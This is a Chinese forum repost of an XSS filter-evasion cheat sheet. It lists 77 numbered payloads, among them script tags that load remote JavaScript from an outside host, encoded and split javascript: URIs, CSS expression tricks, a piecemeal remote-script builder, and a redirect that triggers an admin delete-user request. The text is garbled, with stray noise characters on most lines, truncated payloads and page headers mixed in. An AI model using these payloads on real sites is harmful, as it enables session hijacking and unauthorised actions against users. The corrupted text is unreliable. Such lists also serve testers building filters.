貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。9 f8 S3 l- k* O6 n- y9 B$ W3 a$ C
(1)普通的XSS JavaScript注入0 A3 V8 a7 C+ I. W2 `9 N# v
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 ~& e& P( V7 ?7 B" a4 W' b(2)IMG标签XSS使用JavaScript命令
( W; s& ]& E6 p1 p+ ^0 P: K<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 p, {# u2 ]8 x" R
(3)IMG标签无分号无引号; Z7 a9 N q' F
<IMG SRC=javascript:alert(‘XSS’)>, ~- R, T; M9 t% H# L
(4)IMG标签大小写不敏感
- ~# n/ D$ x2 Y4 {1 s: w8 o$ Q<IMG SRC=JaVaScRiPt:alert(‘XSS’)>0 W+ r. f8 k/ w) ]4 G2 _% m B$ t
(5)HTML编码(必须有分号)* }1 r2 ]* t/ g
<IMG SRC=javascript:alert(“XSS”)>
; S, L& f r( o. ~- [ j' J% c(6)修正缺陷IMG标签
" }* q# E, e) a) Q; t% j<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>; m6 m5 E9 ` |& E$ q6 B: X. l
" N* U4 L @; E* Y. u! H
) V+ M$ Y' z- h' c( e+ G- y
(7)formCharCode标签(计算器) D+ }- \- |+ u; T& y
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
, ^! Y* b7 X- g& d(8)UTF-8的Unicode编码(计算器)' }* C7 P: l0 I0 n3 Q, Y0 N
<IMG SRC=jav..省略..S')>
& a3 s S, h/ p1 f# q8 g( I( y(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
( W* @& W$ E5 O# A( x6 b7 y9 J' Q<IMG SRC=jav..省略..S')>8 B- R( j9 N( G
(10)十六进制编码也是没有分号(计算器)
9 j9 X, K3 D% ?: G<IMG SRC=java..省略..XSS')>3 ^5 s7 b3 f" C3 i
(11)嵌入式标签,将Javascript分开
) ^. i' J+ W+ [/ D/ c% V3 F) `<IMG SRC=”jav ascript:alert(‘XSS’);”>
) }/ R: P8 L* d2 ?) @* |(12)嵌入式编码标签,将Javascript分开
* _% B2 {/ P. y2 ~<IMG SRC=”jav ascript:alert(‘XSS’);”>7 ? C3 ]% E/ R( ^; u |, v# n. T
(13)嵌入式换行符
8 j) s! J$ L( r3 X4 I# t, v<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 X; H, {( G; v% H$ e/ ^. X(14)嵌入式回车4 f, t& }" d; v' t3 d
<IMG SRC=”jav ascript:alert(‘XSS’);”>& \$ r9 q$ g9 T( j) |
(15)嵌入式多行注入JavaScript,这是XSS极端的例子7 y5 `) y( Z1 @7 S3 v2 F
<IMG SRC=”javascript:alert(‘XSS‘)”>1 m1 y! P1 X; U9 }% R' l
(16)解决限制字符(要求同页面)* H! g" ?6 m) C7 ]
<script>z=’document.’</script>4 m- [' L$ q9 x% ^
<script>z=z+’write(“‘</script>
% E: [4 S6 Z- o7 C6 }) a a<script>z=z+’<script’</script>" H0 V6 A5 B5 H8 ^( J2 r
<script>z=z+’ src=ht’</script>
5 L6 C8 [: A) O+ \<script>z=z+’tp://ww’</script>; l6 ?- Z$ L3 n) S
<script>z=z+’w.shell’</script>
" U3 {! y8 \% V' h8 o3 r( V<script>z=z+’.net/1.’</script>( }" S4 ~/ a0 |: T4 F
<script>z=z+’js></sc’</script>0 e9 ]; @) \/ t1 {- g- r# G F4 X# V
<script>z=z+’ript>”)’</script>
( b9 J' T* O$ ^& C+ y& h) D<script>eval_r(z)</script>/ Y9 r8 L% x: y$ {+ y
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
' k% I& j- c" h2 x) M' g( f. X' uhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
& N: }; u! I& V. q5 w: D/ Q! i' l1 z6 Mperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 t: x$ d' |5 z( B* v9 _% o9 @' N(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
- T+ U! S; U- f s7 u, ^4 D- Sperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
9 Y4 M% Q7 ~2 i3 L5 E4 @$ g: w# B/ y(19)Spaces和meta前的IMG标签
8 H8 E3 v& Y- S& b, n# J7 {<IMG SRC=” javascript:alert(‘XSS’);”> [: t8 \* H! x& k( }3 w
(20)Non-alpha-non-digit XSS
; E5 t$ ^' U U [9 Y0 X<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& @ l) u1 s0 q(21)Non-alpha-non-digit XSS to 2
( R" } j1 H0 h5 D& j<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
6 }/ R" F" O5 |; H. G(22)Non-alpha-non-digit XSS to 39 k3 g/ j0 I" c4 k& M% L9 p
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ }3 y. z7 v, S+ ?6 ]9 B" r m(23)双开括号
5 ^/ j; `. G# s) n8 |$ O$ I' H<<SCRIPT>alert(“XSS”);//<</SCRIPT>% _) ~5 |8 d1 l) K0 E3 ^' L6 q
(24)无结束脚本标记(仅火狐等浏览器), ]1 d: h" V5 i* p! r. V Q+ m
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ u# R' ~& _( N6 a" A- i
(25)无结束脚本标记2
! D b* z; o6 W" h; z0 l$ D9 H! |1 u2 ?<SCRIPT SRC=//3w.org/XSS/xss.js>
8 ]2 q' w+ q! ?% E/ N1 H(26)半开的HTML/JavaScript XSS
$ C4 i- e) I6 H, E& H( l2 Y<IMG SRC=”javascript:alert(‘XSS’)”
2 J- r# Q* S+ B% J(27)双开角括号
6 M; {2 [% M$ A+ b1 X<iframe src=http://3w.org/XSS.html <% x% Y: O3 `! `6 j
(28)无单引号 双引号 分号/ G7 o' J+ [3 j7 e: w% a
<SCRIPT>a=/XSS/
) B4 e4 e/ _1 Q1 l* ~alert(a.source)</SCRIPT>0 s1 [7 z) T) w" }
(29)换码过滤的JavaScript
, X- ^2 ]. B, E# Y2 I\”;alert(‘XSS’);//1 |- O$ K. i5 e4 _/ S1 t, t
(30)结束Title标签& u/ @( a7 c/ c5 c, F: q
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
5 M9 T% s' y+ g$ L e(31)Input Image
$ D5 P0 t7 V2 {/ `1 `# o<INPUT SRC=”javascript:alert(‘XSS’);”>
S+ p5 P2 c- D4 X& \! U(32)BODY Image
" s1 @. d* ^2 o: [& ^3 l" B<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
0 N' T; e4 k) O% E" c3 u& d% U(33)BODY标签
+ X( f) k! e0 L. ~<BODY(‘XSS’)>
9 L& ?5 r3 F9 i, k+ V(34)IMG Dynsrc
- t) {' C+ \! d* D2 {5 B<IMG DYNSRC=”javascript:alert(‘XSS’)”>) l# W: Y: F7 t+ ~
(35)IMG Lowsrc+ ]$ U7 o7 ~" P
<IMG LOWSRC=”javascript:alert(‘XSS’)”>" z4 N5 v$ E( M% z: q' y/ e2 u/ r
(36)BGSOUND
: {' q$ s4 A4 P* O1 R<BGSOUND SRC=”javascript:alert(‘XSS’);”>
' v7 v; f& B0 O8 j, s+ O% Z(37)STYLE sheet
4 v0 _6 R; D0 n- d1 A) `<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
% r4 k2 q8 I( Y+ V. v(38)远程样式表2 _/ Y# v# M5 k% L0 u
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>" e6 d; H" ?( l6 a9 G
(39)List-style-image(列表式)
/ O3 {" N8 I- i" `4 p& q<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
+ G# ~# h8 n5 `+ B9 _/ X(40)IMG VBscript
8 b) T2 R+ N) h& n' ^<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
1 r" v9 I6 z/ \ K+ Y8 L4 r7 E1 M(41)META链接url( W" f% s8 I2 G1 O4 n
% m, B1 v0 u3 t* r
9 Q+ m3 G! B }; i* N) y7 U<META HTTP-EQUIV=”refresh” CONTENT=”0;2 a4 m4 w3 K+ J2 }2 m
URL=http://;URL=javascript:alert(‘XSS’);”>: p7 ?4 A& W: ?: @! [. E
(42)Iframe7 h/ `8 e' F$ x% v
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
$ I8 U' @' c+ p' Q) h(43)Frame
! } ~! Q# }% \- Z+ U: `+ x<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
4 W3 K5 D! h# C* U6 U3 n: }( L3 [https://www.t00ls.net/viewthread ... table&tid=15267 3/6
* F, [4 h% w0 m' o" y(44)Table y0 Y/ [0 N( {# Y- C
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
4 n) _7 e6 k- ^9 \/ J8 v(45)TD! i, F) u" e/ j; d
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>. }& a A+ x0 B2 b% G# u
(46)DIV background-image
1 a( _' d8 Y+ K! O e* L6 U. Z<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
) H7 y5 S; Z# B$ z, Q(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-! i. Q0 S) C3 T% H7 `5 {
8&13&12288&65279), s' g3 Z: b- E5 { O) A7 _
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
2 o6 X8 N3 o6 ~# W0 _! f1 k" [(48)DIV expression
9 Y. E( \/ D# h3 s3 Q) B6 ]<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
4 j# Z9 M2 u% l5 t(49)STYLE属性分拆表达
8 c. G* B) E z6 E) E. R; }. R0 x<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ Z% y1 u8 a" ]/ I/ Q
(50)匿名STYLE(组成:开角号和一个字母开头)
5 I; A0 ?! S/ e<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>" a# ^+ D; q' X+ ^9 [4 o) }
(51)STYLE background-image+ Z3 E: ]6 R" e6 F# n# g
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A7 G) g7 H: }6 ]; t+ g
CLASS=XSS></A>+ ?6 k" V6 W2 X* [1 f6 y C8 Z6 ~
(52)IMG STYLE方式
) l" C+ Z: n9 |' |" k" Mexppression(alert(“XSS”))’>9 o$ w8 v9 y/ \- I8 C
(53)STYLE background
4 R; w) g; M: F* r1 |<STYLE><STYLE+ V) g; M4 ~6 G/ r/ \
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
% V! M$ ~4 V; J) ^7 I(54)BASE2 g5 v( z/ w' Q% t1 ?
<BASE HREF=”javascript:alert(‘XSS’);//”>
- R$ @5 d: G8 y& B(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
( P% p1 D4 X- y R2 u- B<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>7 L1 V) V- M* t2 X
(56)在flash中使用ActionScrpt可以混进你XSS的代码
! \6 o: X P U' |5 k9 |a=”get”;
# J" ]' f% J/ kb=”URL(\”";
9 Z* j. g. |4 @( \c=”javascript:”;
3 E" P$ d0 j S5 ~, Gd=”alert(‘XSS’);\”)”;
1 R- s. _1 h' l$ W3 Feval_r(a+b+c+d); ?* x1 {: i6 _4 r6 T
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
0 L2 ]: u! c3 j5 [! A% N* B<HTML xmlns:xss>2 k9 c: `' Z! v" L$ b
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
9 D( z+ d) B1 |: Y# C% f<xss:xss>XSS</xss:xss>
* B9 v+ I% f$ L. \! ^& y</HTML>
$ H# Z# V0 }' i9 u Z(58)如果过滤了你的JS你可以在图片里添加JS代码来利用. J( l1 O! [" j- R
<SCRIPT SRC=””></SCRIPT>
L1 a8 H7 Q$ d7 b+ ~/ A& a(59)IMG嵌入式命令,可执行任意命令, o% G. ]4 S$ b
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
p" S8 f$ B. ?# p(60)IMG嵌入式命令(a.jpg在同服务器)
% I" X" g7 n" `Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
8 [$ f; W1 R& @(61)绕符号过滤
4 p- a( {6 [' a+ I<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>) q- W x) H4 z3 x
(62)
4 ^, X% r( d/ ~3 W$ G4 M `( y; h<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 q0 \& x9 U+ @; i(63)4 m* x' p& _; N% j, r" u% y
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>& C1 X L" f2 s! M% Y& Q @# j
(64)
2 f2 \$ H# b/ j# c+ f7 I<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
7 A7 J# \- |' H( }3 ~) P3 @! b(65)
4 A( V$ u7 C \4 [! z<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>1 s+ A& h) v3 S9 x
(66)12-7-1 T00LS - Powered by Discuz! Board
5 @3 D h1 m. D J @1 q/ j/ fhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
# F( Y1 G# [3 w+ Z- _' N<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT># {/ ?9 |" K1 {
(67)4 Z+ K4 B( @; B3 S. W& S0 U0 N; [
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>( s* [' S2 C) q1 ]9 o# f
</SCRIPT>( D3 X, L% O/ c" O- Z
(68)URL绕行
+ N+ R, Q1 D1 }; }<A HREF=”http://127.0.0.1/”>XSS</A>
, V. n, L- t/ a. R8 h& G0 u(69)URL编码
9 q, [; Q. Y( K, S% J2 z<A HREF=”http://3w.org”>XSS</A>
! A4 j3 H9 T( { R0 Y1 c7 g(70)IP十进制
) D) w# w# V: e3 m<A HREF=”http://3232235521″>XSS</A>) k$ Y& x2 j. t1 u
(71)IP十六进制
1 h) `, m" E5 D! Y O<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
! P$ n8 y2 z F$ m" u+ U(72)IP八进制
* z9 c7 v/ N4 A+ E- S<A HREF=”http://0300.0250.0000.0001″>XSS</A>( G' t- U7 {7 }
(73)混合编码
% d* S4 M+ V! O<A HREF=”h
! u% W0 U3 ^6 _tt p://6 6.000146.0×7.147/”">XSS</A>
. j& ?4 R }) O- [# p, R(74)节省[http:]
+ j3 [' ?) i! @- `. p<A HREF=”//www.google.com/”>XSS</A>& l0 C3 @4 q2 ?: K
(75)节省[www]% ~9 t$ l( y# v
<A HREF=”http://google.com/”>XSS</A>" H+ z$ T7 A0 z f8 d$ h) N4 p
(76)绝对点绝对DNS
1 w6 |4 m5 k' E* [9 s2 i4 t<A HREF=”http://www.google.com./”>XSS</A>' o; j, d! r/ o: ]! A4 }
(77)javascript链接
; y* V6 k* j8 w/ }" S$ C# }" @' p<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
/ Y4 `$ M4 h! ]6 b6 ^8 J
5 k9 ]- c6 a% j5 R% Z- P原文地址:http://fuzzexp.org/u/0day/?p=142 C% i1 L* _; R: P. r# _- ^
! q7 `5 L$ z5 s; d$ g* ^5 ~5 O7 M |